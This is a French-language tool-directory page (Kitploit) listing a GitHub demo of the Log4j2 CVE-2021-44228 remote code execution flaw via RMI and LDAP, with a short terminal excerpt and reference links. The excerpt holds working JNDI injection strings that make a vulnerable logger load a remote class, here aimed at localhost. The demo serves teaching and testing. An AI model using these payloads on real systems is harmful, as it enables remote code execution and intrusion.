Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-44228-Demo — Apache Log4j2 CVE-2021-44228 RCE - Démo avec RMI et LDAP | Kitploit
Outils/GitHubGitHub/mzlogin/cve-2021-44228-demo
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationOutil d'Accès à Distance
GitHubmzlogin/cve-2021-44228-demo

CVE-2021-44228-Demo

Apache Log4j2 CVE-2021-44228 RCE - Démo avec RMI et LDAP

Voir le dépôt
23il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-44228-Demo

Exemple d'injection de code à distance via CVE-2021-44228, par RMI et LDAP.

root@kitploit:~
Exploit class from RMI Server loaded
Hello, ${jndi:rmi://127.0.0.1:1099/exploit}
Exploit class from LDAP Server loaded
Hello, ${jndi:ldap://127.0.0.1:1389/org.mazhuang.ldap.Exploit}

RmiServer et LdapServer nécessitent Python3 pour démarrer.

Références

  • Reproduction de la vulnérabilité d'exécution de code à distance Apache Log4j2
  • Vulnérabilité critique Log4j ! Analyse détaillée des causes ! Première sur tout le web ! et Vulnérabilité critique Log4j (vidéo complémentaire)
  • Log4j Lookups
  • Apache Log4j2 : du RCE au contournement de RC1
  • tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
  • PSA: Log4Shell and the current state of JNDI injection
Télécharger l’outil